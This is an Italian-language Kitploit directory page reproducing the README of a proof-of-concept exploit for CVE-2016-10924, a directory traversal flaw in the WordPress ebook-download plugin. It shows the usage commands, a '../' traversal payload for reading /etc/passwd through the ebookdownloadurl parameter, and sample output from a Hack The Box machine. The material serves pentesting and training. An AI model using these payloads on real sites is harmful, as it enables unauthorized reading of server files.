Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2016-10924-POC — Script di exploit Prova di concetto (PoC) per la vulnerabilità di Directory Traversal (CVE-2016-10924) trovata nel plugin WordPress ebook-download (versioni < 1.2). Questa vulnerabilità consente letture non autorizzate di file tramite una richiesta GET appositamente costruita. | Kitploit
Strumenti/GitHubGitHub/alealeluyah/cve-2016-10924-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubalealeluyah/cve-2016-10924-poc

cve-2016-10924-POC

Script di exploit Prova di concetto (PoC) per la vulnerabilità di Directory Traversal (CVE-2016-10924) trovata nel plugin WordPress ebook-download (versioni < 1.2). Questa vulnerabilità consente letture non autorizzate di file tramite una richiesta GET appositamente costruita.

Vedi Repository
111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2016-10924-POC

Questo repository contiene uno script exploit Proof-of-Concept (PoC) per la vulnerabilità di Directory Traversal (CVE-2016-10924) trovata nel plugin WordPress ebook-download (versioni < 1.2).

Questa vulnerabilità consente letture non autorizzate di file tramite una richiesta GET appositamente modificata. L'exploit sfrutta un parametro chiamato ebookdownloadurl per attraversare le directory sul server target.

Descrizione

  • ID CVE: CVE-2016-10924
  • Tipo di vulnerabilità: Directory Traversal
  • Componente affetto: plugin ebook-download < 1.2 per WordPress
  • Impatto: gli attaccanti remoti possono leggere file arbitrari sul sistema operativo sottostante, come /etc/passwd, manipolando il percorso del file nel parametro ebookdownloadurl.

Nota: Questo PoC è solo per scopi educativi e di test autorizzati. L'uso improprio di queste informazioni può portare a conseguenze legali.

Requisiti

  • Python 3.
  • Libreria requests (installare tramite pip install requests)

Utilizzo

  1. Clona il repository:

    root@kitploit:~
    git clone https://github.com/your-user/CVE-2016-10924-POC.git
    cd CVE-2016-10924-POC
    
  2. Installa le dipendenze:

    root@kitploit:~
    pip install requests
    
  3. Esegui l'exploit:

    root@kitploit:~
    python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
    
  4. Specifica il percorso del file da leggere: Dopo aver avviato lo script, ti verrà richiesto un percorso di file. Ad esempio:

    root@kitploit:~
    ../../../../../../../../../etc/passwd
    

    Potrebbe essere necessario regolare il numero di ../ in base alla posizione della webroot nell'ambiente target.

  5. Uscita:

    • Digita exit, quit o premi Invio su un prompt vuoto per uscire.
    • Premi Ctrl + C per fermare immediatamente lo script.

Esempio

Ho usato questo exploit su "Backdoor", una vecchia macchina di Hack The Box:

root@kitploit:~
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.

Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...

Disclaimer

Questo progetto è inteso esclusivamente per scopi educativi e di test di sicurezza legittimi.
Non utilizzare le informazioni o gli script contenuti in questo repository su alcun sistema per il quale non si disponga di esplicita autorizzazione al test.
L'autore e i contributori non sono responsabili per eventuali usi impropri o danni causati da questo strumento.

Licenza

Questo progetto è concesso in licenza sotto la GNU 2.0 License. Sentiti libero di usarlo e modificarlo, ma per favore dai credito.


Riferimenti

  • NVD - CVE-2016-10924
  • WordPress Plugin ebook-download (per riferimento alle versioni vulnerabili)
Scarica lo strumento